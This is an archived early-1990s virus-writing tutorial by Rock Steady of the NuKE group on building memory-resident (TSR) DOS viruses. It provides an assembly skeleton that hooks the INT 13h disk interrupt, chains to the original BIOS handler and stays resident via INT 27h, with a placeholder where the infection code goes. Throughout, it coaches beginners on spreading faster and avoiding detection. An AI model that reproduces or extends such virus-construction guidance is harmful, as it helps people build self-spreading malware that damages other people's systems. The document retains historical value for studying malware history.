💾 Archived View for spam.works › mirrors › textfiles › virus › rstut002.txt captured on 2023-06-16 at 21:04:22.

View Raw

More Information

-=-=-=-=-=-=-

                        ***********************************
                        **       TSR COM infections      **
                        **                               **
                        **      By Rock Steady/NuKE      **
                        ***********************************

     There are several ways to constructed your viruses. Mainly you have those
 which are RAM-Resident or better known as a TSR program. And with great
 thought we have those which are not RAM-Resident.

     A TSR virus will load into memory and can infect all programs that are
 executed by the computer. Such like my AmiLiA virus which will infect all
 EXE and COM files that are ran. Anyhow a TSR virus can certainly spread a lot
 faster compared to a Non-Resident Virus. Because a NON-Resident Virus will
 only infect file each time it is ran. Though the NON-Resident will start
 off very slowly infecting the system files but after the virus is in the
 system after a number of weeks, it will certainly infect ALL files that are
 in the system. Where a TSR virus will USUALLY infect files that are executed.
 So that only files that are often executed will be infected. But The TSR
 virus can certainly infect A LOT more files than a Non-Resident JUST on the
 first Hour! It is out numbered 10 to 1. This is the advantage that all
 programmers enjoy and program TSR viruses. I will explain a SIMPLE method of
 making your program a TSR one. And it will be as flexible as you want so
 that NO ONE can stay you `Stole' this information off Rock Steady.

     Anyhow I will explain the simple Process of Intercepting ROM-Bios
 Interrupts and hooking your virus/Program to any Interrupt of your choice.
 This method that is being explained is also used ALL the Jerusalem Strains.
 And several of the Vacsina Strains. They total up to close to 100+ Viruses
 that use this simple way with the TSR Interrupt 27h. Anyhow just because I'm
 explaining this method your virus CANNOT be detected because of this TSR
 routines because there are routines I DEVELOPED ALONE and will soon to be
 release in one of my future virii. Anyhow there are an UNLIMITED amount of
 ways to make TSRs so that along as you Develop YOUR OWN routine it will NEVER
 get detected as a virus for all you Beginners. And how this routine can be
 used in several OTHER utilities not just viruses.

                             Beginning...
                             ~~~~~~~~~~~
     First we must Intercept an Interrupt, Lets say we want our virus to
 activate Every TIME the disk I/O is being used we would use INT 13h or
 INT 21h. The INT 13h will activate everytime ANY file is opened or Closed
 And the INT 21h will activity anytime any file is executed or any INT 21h
 functions Like a "DIR" in DOS. If you want you can even hooked your virus
 to INT 10h and it may activate when Graphics are displayed, or you can hook
 it to the interrupt involved with Printer Functions. Whatever seems to
 `EnLighten' you, since we live in a Distressed world, I won't even bother
 why we shouldn't hooked them up to just ANY interrupt.

     Anyhow, interrupts use a vector table at the bottom of memory (ROM) to
 find out what routine in the ROM Bios to call. So the address for Interrupt
 21h would be located at 0000:0084 and for Interrupt 13h it would be found at
 0000:004Ch. So we can change theses addresses in the vector table. What we
 do is we change the vector address to POINT to our virus. So everytime the
 Interrupt is called it goes to the vector table and the table tells it to
 call our Virus, rather than calling the ROM Bios. But what MUST do
 FIRST is save the ORIGINAL Interrupt routine and place that somewhere in
 memory. So that our virus will call the Original ROM Bios routine after
 executing itself.

     Lets say we hooked our Virus to the INT 13h, which controls all Disk
 Activities. So if our Computer users tries to read something from the disk
 the Computer will call the INT 13h bios Routines on How To do it. But
 instead of finding the INT 13h routines it calls our virus, and the Virus
 gets ran, which then our virus does what it has to do, and then runs the
 Original INT 13h Routine where-ever it was stored. So it simulates an INT
 call to the ROM bios routines.

 ;----------------------------------------------------------------
 ; Sample Program on how to Hook your virus to an Interrupt call.
 ;----------------------------------------------------------------
 Code        Segment
         Assume  cs:code,ss:code,ds:code,es:code
         Org     100h       ; Guess this will be a COM file? Huh?


 Begin:  JMP     Bios_Routine

         NOP                  ; This is just a cheap .COM file that the
         NOP                  ; virus is attached to. Remember you should
         NOP                  ; have the first 3 bytes written in your
         INT     20h          ; virus.

 OLD_ROM_INT     DD      ?    ;Our Stack to save the OLD Int Address

 ;----------------------------------------------------------------
 ; This Calls the VIRUS and then the simulates the OLD Rom Routine
 ;----------------------------------------------------------------
 Virus_Codes    PROC     FAR
        Assume  cs:code, ds:nothing

        pushf               ; Everytime the ROM-Routine is call this
        push    ax          ; is what happens... Saves the Regesters
        push    di          ; And runs Our Virus... Then it restores
        push    si          ; the regesters and Runs the OLD_ROM Bios
        push    es          ; Routine that was supposed to be ran in
        push    ds          ; the first place...
        call    The_Virus
        pop     ds          ;NoTe: It's better to SAVE all Regesters and
        pop     es          ; Flags because our Virus WILL ALTER a few
        pop     si          ; And when the Virus leaves control back to the
        pop     di          ; Computer it is EXPECTED to continue where it
        pop     ax          ; It left off...
        popf

        pushf            ; This `pushf' is NEEDED to act like a simulated
        call    OLD_ROM_INT       ; ROM Bios Interrupt call...

        ret
 Virus_Codes   ENDP

 ;----------------------------------------------------------------
 ; Put the REAL Virus Codes here...
 ;----------------------------------------------------------------
 The_Virus        PROC    NEAR
        ...            ; Put your OWN Virus codes here...
        ...            ; Just make it compatible with our
        ...            ; Codes... Try to make it small and
        ...            ; it will take up less space in the
        ...            ; users' memory.
        ...
        ...            ;NoTe: Try to infect files that are ONLY
        ...            ; Executed! Rather than each time the INT
        ...            ; is used... Get it?
        RET
 The_Virus      ENDP

 ;---------------------------------------------------------------
 ; This is the Procedure that SAVE the OLD_ROM Bios in our Virus
 ; And places a Call to point to our Virus. Which then Calls the
 ; OLD_ROM Bios Routine. So Remember to SAVE it first.
 ;---------------------------------------------------------------
 Bios_Routine   PROC    NEAR
        Assume  cs:code,ds:code

        mov     ah,35h      ; This Asks for the interrupt vector!
        mov     al,13h      ; whatever is in AL is what int vector
        int     21h         ; address you get and is stored in ES:BX

        mov     word ptr OLD_ROM_INT,bx   ;Save the BX register in our Stack
        mov     word ptr OLD_ROM_INT[2],es ;And same to the ES Register

 ; Here you SHOULD put a small routine to check if the Interrupt vector has
 ; already been changed! For INT 13h this should contain 0000:004Ch the
 ; formula for this is (Interrupt # times 4) For INT 21h it is (21hx4)=84h
 ; and so on. So if its been changed it means the virus has already changed
 ; it! And it `Should' be resident. How ever this is a simple way of doing
 ; it. but not always the BEST way... Because any program the hooks to the
 ; virus interrupt will fool the virus to think it is already resident.
 ; Though this source is NOT for the Professional Virus Programmer like myself
 ; because WE KNOW! But for those that are half way there...

        mov     ah,25h    ; This asks to set a Interrupt vector address!
        mov     al,13h    ; Interrupt # to be set goes in AL
        mov     dx,offset Virus_Codes ; Sets INT 13h to point to `Virus Code'
        int     21h

        mov     dx,offset Bios_Routine
        int     27h
 Bios_Routine     ENDP

 ;  Anything after this point will not be memory resident. because the end
 ;  of the resident portion ends at `Bios_Routine' procedure.

 Code        ENDS
      END    Begin
 ;----------------------------- EnD ----------------------------------

 Simple isn't it? Anyhow I tried to make this as simple as possible. I
 hope I didn't lose you. Anyhow this is a simple routine that several
 TSR virii use. Anyhow, see what that gives you....

                           Rock Steady
               NukE / Viral Development Researcher
                             -PeAcE-